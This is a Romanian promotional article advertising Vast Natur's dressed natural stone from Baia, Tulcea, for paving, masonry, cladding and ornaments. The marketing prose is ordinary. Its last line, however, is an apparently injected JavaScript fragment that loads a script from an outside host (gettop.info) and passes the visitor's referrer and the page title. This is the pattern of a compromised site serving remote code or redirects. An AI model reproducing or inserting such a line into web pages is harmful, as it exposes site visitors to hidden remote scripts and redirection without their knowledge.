piatra naturala fasonataPiatra este una dintre cele mai rezistente si estetice material folosite in constructii. Daca ai un proiect pentru care ai nevoie de piatra naturala fasonata de calitate, apeleaza cu incredere la firma Vast Natur.

Firma Vast Natur a fost infiintata in anul 2003 si are sediul in Constanta. Firma este producator de piatra naturala decorative si activitatile companiei sunt legate de extractia, prelucrarea si comercializarea produselor din piatra naturala ornamentala. De la locuinte private, restaurante, baruri, si pana la garduri, alei sau suprafete ale unor monumente istorice, utilizarea pietrei naturale ofera garantia unui design elegant, modern si de bun gust.

Conform agrementului tehnic efectuat de INCERC, piatra naturala oferita de firma Vast Natur este piatra decorativa ce poate fi folosita sub forma de placi, blocuri, piatra sparta sau bruta in diverse aplicatii de amenajare.

Pentru amenajari cu personalitate alege piatra naturala fasonata de la Vast Natur

 De ce sa alegi firma Vast Natur?

Vast Natur realizeaza produse pentru placari cu piatra ornamentala, pavari cu piatra pentru alei si gradini, zidarie rustica, placari de pereti interiori sau exteriori, garduri, pardoseli, trepte, lucrari si proiecte speciale. Calitatea superioara si proprietatile deosebite ale pietrei oferite de catre Vast Natur acopera toate cerintele firmelor de constructii şi arhitecti, showroom-uri si distribuitori.

Cu deosebitele caracteristici ale pietrei de Baia-Tulcea, Vast Natur ofera produse finite remarcabile, cu o frumusete durabila, cu design mereu actualizat si modern. Clientii au ajutat firma sa aiba o crestere constanta in ultimii ani pentru ca diversitatea produselor si serviciile speciale au fost mereu la o calitate inalta.

Unde puteti folosi piatra naturala fasonata de la Vast Natur?

– Amenajari curti

Piatra naturala fasonata se remarca printr-o rezistenta crescuta la ciclurile repetate de inghet-dezghet, socuri mecanice, la crapaturi si abraziune. Pietrele natural nu ofera doar garantia utilizarii o perioada indelungata de timp, ci si puncteaza la capitolul estetic. De culoare crem sau alb, aceste pietre se incadreaza perfect in orice spatiu, conferindu-i eleganta si rafinament.

– Zidarie

Fie ca aveti nevoie de garduri de piatra, coloane, ziduri de separatie si chiar placari din piatra pe peretii exteriori si interiori, piatra naturala fasonata are un aspect ce nu poate fi imitat de niciun alt material, oferind o nota aparte.

– Ornamente

Pueti sa folositi piatra naturala fasonata chiar si pentru ornamente, sub forma sparta, in blocuri sau sub forma de placi decorative.

 Decorari exterioare

piatra naturala fasonataPiatra naturala fasonata este alegerea cea mai buna pentru decorari exterioare, decorarea peretilor exteriori ai cladirilor, monumentelor si constructiile din parcuri sau gradini.

Deoarece piatra naturala fasonata poate fi folosita intr-o varietate de feluri, ea este optiunea cea mai buna pentru proiectul tau. Extrasa din localitatea Baia, judetul Tulcea, piatra naturala fasonata  este cunoscuta in toata tara pentru rezistenta la trecerea timpului si duritatea mare in orice mediu.

Pentru informatii suplimentare, acceseaza pagina de internet a companiei sau solicita asistenta unuia dintre membrii echipei firmei Vast Natur. Achizitioneaza piatra naturala fasonata oferita de compania Vast Natur la preturi fara concurenta pentru a executa amenajari dintre cele mai frumoase. Echipa de profesionisti iti sta la dispozitie cu informatii si sfaturi pentru ca tu sa faci alegerea perfecta.

 

 

 s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;